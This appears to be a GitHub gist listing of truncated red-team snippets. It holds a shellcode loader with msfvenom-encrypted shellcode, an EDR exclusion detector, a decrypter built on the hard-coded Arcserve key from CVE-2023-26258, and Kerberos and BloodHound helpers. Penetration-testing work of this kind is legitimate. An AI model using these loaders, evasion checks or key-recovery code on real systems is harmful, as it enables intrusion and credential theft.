
dadevel / README.md
Last active April 9, 2024 07:56
BloodHound Query Utility
dadevel / README.md
Last active March 19, 2024 13:18
Proxychains Quick Config
dadevel / Dockerfile
Last active February 18, 2024 14:46
Neo4j container with APOC and GDS
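# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12
# NOTE(review): NEO4J_AUTH=none disables database authentication entirely; the 127.0.0.1 port
# bindings are the only thing keeping the instance off the network. Do not widen them (e.g. to
# 0.0.0.0 or a bare -p 7474:7474) without setting a real password.
FROM docker.io/library/neo4j:4.4.12
# plugin versions must match the neo4j 4.4.x line:
# apoc: https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json
# gds:  https://graphdatascience.ninja/versions.json
ARG APOC_VERSION=4.4.0.11
ARG GDS_VERSION=2.2.3
# optional sha256 of each jar; when set, the build fails if the download does not match.
# Both jars are pulled over https from third-party hosts and are otherwise loaded into the
# database unverified, so pin the hashes for anything beyond a throwaway lab build.
ARG APOC_SHA256=
ARG GDS_SHA256=
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar "https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/${APOC_VERSION}/apoc-${APOC_VERSION}-all.jar" && \
    { [ -z "$APOC_SHA256" ] || echo "$APOC_SHA256  /var/lib/neo4j/plugins/apoc.jar" | sha256sum -c -; }
RUN wget -qO /var/lib/neo4j/plugins/gds.jar "https://graphdatascience.ninja/neo4j-graph-data-science-${GDS_VERSION}.jar" && \
    { [ -z "$GDS_SHA256" ] || echo "$GDS_SHA256  /var/lib/neo4j/plugins/gds.jar" | sha256sum -c -; }
# unrestricted= marks every apoc/gds procedure as not sandboxed, allowlist= makes them callable.
# Narrow both patterns to the procedures actually needed if this image is ever reachable by
# anyone other than the local analyst.
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \
    echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf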
dadevel / style.css
Created February 14, 2024 19:45
Protective Branding for M365
/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */
/* NOTE(review): the background is loaded by every user's browser from
   protective-branding.cloudgate.workers.dev, a host outside the tenant. Whoever controls that
   host (or its name resolution) controls what the tenant's sign-in page shows, so either
   self-host the SVG or treat that host as part of the sign-in trust boundary. */
.ext-sign-in-box {
background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg");
}
dadevel / byorwx.cpp
Last active December 4, 2023 20:57
Bring your own RWX section
#include <cstdint>
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
dadevel / CheckDLLs.ps1
Last active November 8, 2023 12:24
EDR Exclusion Detector
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73
# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | ft -auto
function Get-LoadedModules {
param(
[Parameter(Mandatory,ValueFromPipeline)]
[System.Diagnostics.Process]
$Processes,
[Parameter(Mandatory)]
[string[]]
dadevel / README.md
Last active November 8, 2023 09:38
BloodHound Queries
dadevel / ArcserveDecrypter.cpp
Last active August 31, 2023 20:30
ArcserveDecrypter
#include <windows.h>
#include <stdio.h>
// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp
// usage: ./ArcserveDecrypter.exe HEXBLOB
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c
// Hard-coded key from the referenced CVE-2023-26258 decrypter: the UTF-16LE encoding of the
// string "Please input a valid password" (29 code units, 58 bytes, no terminator).
// Written as char/0x00 pairs so the text is readable; the byte values are unchanged.
// How the key is applied to the hex blob lives further down in the file (not in this excerpt).
constexpr unsigned char key[] = {
    'P', 0x00, 'l', 0x00, 'e', 0x00, 'a', 0x00, 's', 0x00, 'e', 0x00, ' ', 0x00,
    'i', 0x00, 'n', 0x00, 'p', 0x00, 'u', 0x00, 't', 0x00, ' ', 0x00,
    'a', 0x00, ' ', 0x00,
    'v', 0x00, 'a', 0x00, 'l', 0x00, 'i', 0x00, 'd', 0x00, ' ', 0x00,
    'p', 0x00, 'a', 0x00, 's', 0x00, 's', 0x00, 'w', 0x00, 'o', 0x00, 'r', 0x00, 'd', 0x00,
};
// byte length of the key (58), not the character count
constexpr auto key_len = sizeof(key);
dadevel / impacket-ccache-helper.py
Last active July 15, 2023 14:02
Impacket Ticket Helper
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
import base64
import hashlib
import itertools
import os
import shlex
import sys
from impacket.krb5.ccache import CCache
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from zipfile import ZipFile
import json
import shutil
# from https://github.com/fox-it/BloodHound.py/blob/273984883d9ca3dd21f6fca35ec88671cac3fc87/bloodhound/ad/trusts.py#L59
TRUST_DIRECTIONS = {
0: 'Disabled',
1: 'Inbound',